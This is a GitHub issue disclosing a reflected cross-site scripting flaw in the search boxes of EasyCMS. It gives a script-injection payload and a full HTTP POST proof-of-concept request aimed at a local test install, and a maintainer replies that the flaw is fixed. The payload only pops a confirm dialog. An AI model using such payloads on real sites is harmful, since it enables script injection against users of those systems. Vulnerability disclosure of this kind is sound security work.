Skip to content
This repository has been archived by the owner on Dec 26, 2019. It is now read-only.

Easycms has a Reflexive Cross Site Scripting Vulnerability #1

Closed
Oran9e opened this issue Apr 24, 2018 · 1 comment
Closed

Easycms has a Reflexive Cross Site Scripting Vulnerability #1

Oran9e opened this issue Apr 24, 2018 · 1 comment

Comments

@Oran9e
Copy link

Oran9e commented Apr 24, 2018

Download and install, on the front page,
http://127.0.0.1/test/EasyCMS-master/index.php)
All search boxes exist in XSS, payload : "/><script>confirm(1234)</script>

exp:
POST /test/EasyCMS-master/index.php?s=/index/search/index.html HTTP/1.1
Host: 127.0.0.1
User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64; rv:59.0) Gecko/20100101 Firefox/59.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Referer: http://127.0.0.1/test/EasyCMS-master/index.php
Content-Type: application/x-www-form-urlencoded
Content-Length: 55
Cookie: dwz_theme=default; UM_distinctid=162db899f8a468-018514197574c8-17347a40-100200-162db899f8c3bc; CNZZDATA1707573=cnzz_eid%3D271628251-1524101653-http%253A%252F%252F127.0.0.1%252F%26ntime%3D1524101653; Hm_lvt_7b43330a4da4a6f4353e553988ee8a62=1524187137; rlF_lastvisit=1726%091524191267%09%2Ftest%2Fphpwind_v9.0.2_utf8%2Fphpwind_v9.0.2_utf8_20170401%2Findex.php%3Fm%3Ddesign%26c%3Dapi%26token%3Dt8QiA81ydN%26id%3D7%26format%3D; frog_auth_user=exp%3D1525680458%26id%3D1%26digest%3D5a4183bf1c5de0fa91a7f31422e9a38e; think_template=default; bdshare_firstime=1524499462104; PHPSESSID=k4mlmjoo06qvrnks6hbsut3795; yzmphp_adminid=02fcWP1tbVyO3qjAa1o4Oj7ByNDb2DbcZpROpdWw; yzmphp_adminname=f744FywtmY54ZekJU2rO-dU8YZXZce7dHJjsdStEKAEwM5M; Hm_lpvt_7b43330a4da4a6f4353e553988ee8a62=1524187137; rlF_visitor=Dn3slOh4nWLgDBhDSMUhGlC3PsR%2FyarbBZim4JqNJp2SKE9mCXr3gw%3D%3D; csrf_token=5ac0a94ca5abfea6
Connection: keep-alive
Upgrade-Insecure-Requests: 1

s="/><script>confirm(1234)</script>
1

@jaychenthinkfast
Copy link
Collaborator

thanks! we had fix this problem

Sign up for free to subscribe to this conversation on GitHub. Already have an account? Sign in.
Labels
None yet
Projects
None yet
Development

No branches or pull requests

2 participants